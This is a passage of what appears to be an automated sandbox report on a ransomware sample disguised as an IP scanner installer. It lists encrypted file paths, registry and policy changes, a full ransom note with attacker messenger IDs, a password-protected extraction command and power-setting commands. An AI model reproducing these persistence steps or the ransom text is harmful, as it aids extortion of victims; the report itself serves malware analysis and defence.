Office\MEDIA\OFFICE14\AUTOSHAP\BD18212_.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107042.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR30F.GIF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\7-Zip\7z.sfx.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285808.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115856.GIF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe -
pid Process 2404 powershell.exe 1924 powershell.exe 1736 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7za.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BACHOKTECHET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Everything.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BACHOKTECHET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BACHOKTECHET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xdel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language advanced_ip_scanner.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BACHOKTECHET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Everything.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xdel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7za.exe -
Modifies registry class 19 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\MACHINE\Software\Classes\mimicfile\shell\open\command BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" BACHOKTECHET.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command BACHOKTECHET.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command\ = "\"%1\" %*" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command BACHOKTECHET.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\README_SOLVETHIS.txt\"" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\Software\Classes\.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY\ = "mimicfile" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\exefile\shell\open\command\ = "\"%1\" %*" ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1784 notepad.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 832 DC.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 2560 BACHOKTECHET.exe 832 DC.exe 832 DC.exe 832 DC.exe 2404 powershell.exe 1736 powershell.exe 1924 powershell.exe 2876 BACHOKTECHET.exe 2884 BACHOKTECHET.exe 2560 BACHOKTECHET.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2468 7za.exe Token: 35 2468 7za.exe Token: SeRestorePrivilege 2636 7za.exe Token: 35 2636 7za.exe Token: SeSecurityPrivilege 2636 7za.exe Token: SeSecurityPrivilege 2636 7za.exe Token: SeIncreaseQuotaPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeSecurityPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeTakeOwnershipPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeLoadDriverPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeSystemProfilePrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeSystemtimePrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeProfSingleProcessPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeIncBasePriorityPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeCreatePagefilePrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeBackupPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeRestorePrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeShutdownPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeDebugPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeSystemEnvironmentPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeChangeNotifyPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeRemoteShutdownPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeUndockPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeManageVolumePrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeImpersonatePrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeCreateGlobalPrivilege 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: 33 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: 34 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: 35 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe Token: SeIncreaseQuotaPrivilege 2560 BACHOKTECHET.exe Token: SeSecurityPrivilege 2560 BACHOKTECHET.exe Token: SeTakeOwnershipPrivilege 2560 BACHOKTECHET.exe Token: SeLoadDriverPrivilege 2560 BACHOKTECHET.exe Token: SeSystemProfilePrivilege 2560 BACHOKTECHET.exe Token: SeSystemtimePrivilege 2560 BACHOKTECHET.exe Token: SeProfSingleProcessPrivilege 2560 BACHOKTECHET.exe Token: SeIncBasePriorityPrivilege 2560 BACHOKTECHET.exe Token: SeCreatePagefilePrivilege 2560 BACHOKTECHET.exe Token: SeBackupPrivilege 2560 BACHOKTECHET.exe Token: SeRestorePrivilege 2560 BACHOKTECHET.exe Token: SeShutdownPrivilege 2560 BACHOKTECHET.exe Token: SeDebugPrivilege 2560 BACHOKTECHET.exe Token: SeSystemEnvironmentPrivilege 2560 BACHOKTECHET.exe Token: SeChangeNotifyPrivilege 2560 BACHOKTECHET.exe Token: SeRemoteShutdownPrivilege 2560 BACHOKTECHET.exe Token: SeUndockPrivilege 2560 BACHOKTECHET.exe Token: SeManageVolumePrivilege 2560 BACHOKTECHET.exe Token: SeImpersonatePrivilege 2560 BACHOKTECHET.exe Token: SeCreateGlobalPrivilege 2560 BACHOKTECHET.exe Token: 33 2560 BACHOKTECHET.exe Token: 34 2560 BACHOKTECHET.exe Token: 35 2560 BACHOKTECHET.exe Token: SeIncreaseQuotaPrivilege 2876 BACHOKTECHET.exe Token: SeSecurityPrivilege 2876 BACHOKTECHET.exe Token: SeTakeOwnershipPrivilege 2876 BACHOKTECHET.exe Token: SeLoadDriverPrivilege 2876 BACHOKTECHET.exe Token: SeSystemProfilePrivilege 2876 BACHOKTECHET.exe Token: SeSystemtimePrivilege 2876 BACHOKTECHET.exe Token: SeProfSingleProcessPrivilege 2876 BACHOKTECHET.exe Token: SeIncBasePriorityPrivilege 2876 BACHOKTECHET.exe Token: SeCreatePagefilePrivilege 2876 BACHOKTECHET.exe Token: SeIncreaseQuotaPrivilege 1756 BACHOKTECHET.exe Token: SeBackupPrivilege 2876 BACHOKTECHET.exe Token: SeSecurityPrivilege 1756 BACHOKTECHET.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 316 Everything.exe 1876 Everything.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2464 wrote to memory of 2468 2464 advanced_ip_scanner.exe 31 PID 2464 wrote to memory of 2468 2464 advanced_ip_scanner.exe 31 PID 2464 wrote to memory of 2468 2464 advanced_ip_scanner.exe 31 PID 2464 wrote to memory of 2468 2464 advanced_ip_scanner.exe 31 PID 2464 wrote to memory of 2636 2464 advanced_ip_scanner.exe 33 PID 2464 wrote to memory of 2636 2464 advanced_ip_scanner.exe 33 PID 2464 wrote to memory of 2636 2464 advanced_ip_scanner.exe 33 PID 2464 wrote to memory of 2636 2464 advanced_ip_scanner.exe 33 PID 2464 wrote to memory of 2180 2464 advanced_ip_scanner.exe 35 PID 2464 wrote to memory of 2180 2464 advanced_ip_scanner.exe 35 PID 2464 wrote to memory of 2180 2464 advanced_ip_scanner.exe 35 PID 2464 wrote to memory of 2180 2464 advanced_ip_scanner.exe 35 PID 2180 wrote to memory of 2560 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe 36 PID 2180 wrote to memory of 2560 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe 36 PID 2180 wrote to memory of 2560 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe 36 PID 2180 wrote to memory of 2560 2180 ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe 36 PID 2560 wrote to memory of 316 2560 BACHOKTECHET.exe 37 PID 2560 wrote to memory of 316 2560 BACHOKTECHET.exe 37 PID 2560 wrote to memory of 316 2560 BACHOKTECHET.exe 37 PID 2560 wrote to memory of 316 2560 BACHOKTECHET.exe 37 PID 2560 wrote to memory of 1860 2560 BACHOKTECHET.exe 38 PID 2560 wrote to memory of 1860 2560 BACHOKTECHET.exe 38 PID 2560 wrote to memory of 1860 2560 BACHOKTECHET.exe 38 PID 2560 wrote to memory of 1860 2560 BACHOKTECHET.exe 38 PID 2560 wrote to memory of 1756 2560 BACHOKTECHET.exe 39 PID 2560 wrote to memory of 1756 2560 BACHOKTECHET.exe 39 PID 2560 wrote to memory of 1756 2560 BACHOKTECHET.exe 39 PID 2560 wrote to memory of 1756 2560 BACHOKTECHET.exe 39 PID 2560 wrote to memory of 2884 2560 BACHOKTECHET.exe 40 PID 2560 wrote to memory of 2884 2560 BACHOKTECHET.exe 40 PID 2560 wrote to memory of 2884 2560 BACHOKTECHET.exe 40 PID 2560 wrote to memory of 2884 2560 BACHOKTECHET.exe 40 PID 2560 wrote to memory of 2876 2560 BACHOKTECHET.exe 41 PID 2560 wrote to memory of 2876 2560 BACHOKTECHET.exe 41 PID 2560 wrote to memory of 2876 2560 BACHOKTECHET.exe 41 PID 2560 wrote to memory of 2876 2560 BACHOKTECHET.exe 41 PID 1860 wrote to memory of 832 1860 cmd.exe 43 PID 1860 wrote to memory of 832 1860 cmd.exe 43 PID 1860 wrote to memory of 832 1860 cmd.exe 43 PID 1860 wrote to memory of 832 1860 cmd.exe 43 PID 2560 wrote to memory of 2724 2560 BACHOKTECHET.exe 44 PID 2560 wrote to memory of 2724 2560 BACHOKTECHET.exe 44 PID 2560 wrote to memory of 2724 2560 BACHOKTECHET.exe 44 PID 2560 wrote to memory of 2724 2560 BACHOKTECHET.exe 44 PID 2560 wrote to memory of 2912 2560 BACHOKTECHET.exe 45 PID 2560 wrote to memory of 2912 2560 BACHOKTECHET.exe 45 PID 2560 wrote to memory of 2912 2560 BACHOKTECHET.exe 45 PID 2560 wrote to memory of 2912 2560 BACHOKTECHET.exe 45 PID 2560 wrote to memory of 2972 2560 BACHOKTECHET.exe 46 PID 2560 wrote to memory of 2972 2560 BACHOKTECHET.exe 46 PID 2560 wrote to memory of 2972 2560 BACHOKTECHET.exe 46 PID 2560 wrote to memory of 2972 2560 BACHOKTECHET.exe 46 PID 2560 wrote to memory of 2356 2560 BACHOKTECHET.exe 47 PID 2560 wrote to memory of 2356 2560 BACHOKTECHET.exe 47 PID 2560 wrote to memory of 2356 2560 BACHOKTECHET.exe 47 PID 2560 wrote to memory of 2356 2560 BACHOKTECHET.exe 47 PID 2560 wrote to memory of 2140 2560 BACHOKTECHET.exe 48 PID 2560 wrote to memory of 2140 2560 BACHOKTECHET.exe 48 PID 2560 wrote to memory of 2140 2560 BACHOKTECHET.exe 48 PID 2560 wrote to memory of 2140 2560 BACHOKTECHET.exe 48 PID 2560 wrote to memory of 2228 2560 BACHOKTECHET.exe 50 PID 2560 wrote to memory of 2228 2560 BACHOKTECHET.exe 50 PID 2560 wrote to memory of 2228 2560 BACHOKTECHET.exe 50 PID 2560 wrote to memory of 2228 2560 BACHOKTECHET.exe 50 -
System policy modification 1 TTPs 9 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Hi!\nHave a troubles?\nYour personal ID: MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY*ELONMUSKISGREEDY-MXZCcZMKlH0fG2axWwGFs0-LS4o16yR654zA6lEkIiY\nWe will solve your problem but you need to pay to get your files back\nI will show you all possible proofs before payment\nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software - it may cause permanent data loss. \nWe are always ready to cooperate and find the best way to solve your problem. \nIf you write in 24h you will have a good discount\nWrite us\n1)Session Private Messenger\nYou can download it to chat with us\nOn your server,pc or laptop - getsession.org/download\nInstall it and press PLUS\nWrite new message\nPut there my SESSION ID\n0568a6df0e0cecd44aee201a1c3c871be786013afa00bae1ed00b704d98d2a9215\nAlso you can install this messenger on your phone\nSESSION at GOOGLE PLAY/APPSTORE\nInstall it and add me 0568a6df0e0cecd44aee201a1c3c871be786013afa00bae1ed00b704d98d2a9215\n2) TOX messenger (fast and anonymous)\nhttps://tox.chat/download.html\nInstall qtox\nPress sign up\nCreate your own name\nPress plus\nPut there our tox ID:\nE9164A982410EFAEBC451C1D5629A2CBB75DBB6BCDBD6D2BA94F4D0A7B0B616F911496E469FB\nAnd add me/write message\n3)Jami messenger (Fastest and anonymous)\nhttps://jami.net/\nAlso you can find it on your phone at google play/app store\nInstall it on your server,phone or tablet\nPress sign up and do your own nickname\nAnd add me/write message - Decryptionguy (use search)\n\n\n\n" BACHOKTECHET.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection\AllowTelemetry = "0" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Policies\System BACHOKTECHET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = " " BACHOKTECHET.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer BACHOKTECHET.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HidePowerOptions = "1" BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System BACHOKTECHET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection BACHOKTECHET.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\advanced_ip_scanner.exe"C:\Users\Admin\AppData\Local\Temp\advanced_ip_scanner.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" i2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" x -y -p1197321047146881885 Everything64.dll2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ENC_default_default_2024-08-23_22-53-04=ELONMUSKISGREEDY.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe"3⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2560 -
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\Everything.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\Everything.exe" -startup4⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:316
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c DC.exe /D4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\DC.exeDC.exe /D5⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:832
-
-
-
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe" -e watch -pid 2560 -!4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe" -e ul14⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2884
-
-
C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe"C:\Users\Admin\AppData\Local\BFBF5FF3-02FF-66A7-72D2-688544C61A80\BACHOKTECHET.exe" -e ul24⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -H off4⤵
- Power Settings
PID:2724
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:2912
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:2972
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:2356
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:2140
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:2228
-
-
C:\Windows\system32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:1624
-
-
